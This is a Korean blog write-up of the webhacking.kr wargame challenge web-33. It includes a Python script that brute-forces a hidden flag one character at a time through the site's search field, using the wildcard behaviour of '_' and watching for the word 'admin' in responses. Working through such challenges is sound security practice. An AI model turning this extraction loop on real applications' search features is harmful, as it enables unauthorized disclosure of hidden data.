728x90
readme 파일을 클릭하면 access denied가 뜬다
대충 readme 파일에 flag가 있는거 같다.
hi 파일에는 hello~ 라는 문자만 있고 해서 search에 hello를 쳐봤는데 guest 테이블 밖에 안나왔다.
그래서 flag{ 도 쳐봤는데 admin테이블만 나왔다.
그럼 flag{ 뒤의 문자열을 무차별 대입해서 찾아내기만 하면 된다!
버프스위트의 인트루더 기능을 사용해보고 싶었는데 시간이 너무 오래 걸리고 사용법도 익숙치 않아서 파이썬으로 넘어왔다.
from requests import post
host = "https://webhacking.kr/challenge/web-33/"
password ="flag{"
str = "acdefghiklmnostuy_"
isStr = False
while True:
for s in str:
r = post(host, data={'search':password+s})
if "admin" in r.text:
isStr = True
password+=s
print(password)
break
if isStr == False:
break
isStr = False
password+='}'
print(password)
str 문자에 있는 값들은 대충 버프스위트 인트루더 기능을 돌려보니깐 저 문자 중에 있다는걸 확인했고 시간을 줄이고자 대충 저 문자들만 적어놨다.
그리고 password에 문자를 하나씩 대입해가며 admin만 나오는걸 찾으면 되는데
돌려보니 결과가 이렇게 나왔다.
search에 _ 를 넣으면 그냥 아무것도 없는 문자 취급해서 통과시키는데 그래서인지 마지막에 so 뒤에 _가 두번 나왔다.
그래서 저 so가 끝인줄 알고 flag 대입해봤는데 뒤에 문자가 더있는지 통과가 되지않았다.
그래서 대충 ? 추가해보니 통과 됐다 ㄷㄷ;
(flag 내용이 심상치 않음...)
728x90
반응형
'Web Hacking > Webhacking.kr' 카테고리의 다른 글
| Webhacking.kr old-41 풀이 (0) | 2023.12.24 |
|---|---|
| Webhacking.kr old 43 풀이 (0) | 2023.12.21 |
| Webhacking.kr old 37 (해결X) (0) | 2023.12.14 |
| Webhacking.kr 23번 문제 풀이 (0) | 2023.12.03 |
| Webhacking.kr old-61 풀이 (0) | 2023.12.03 |
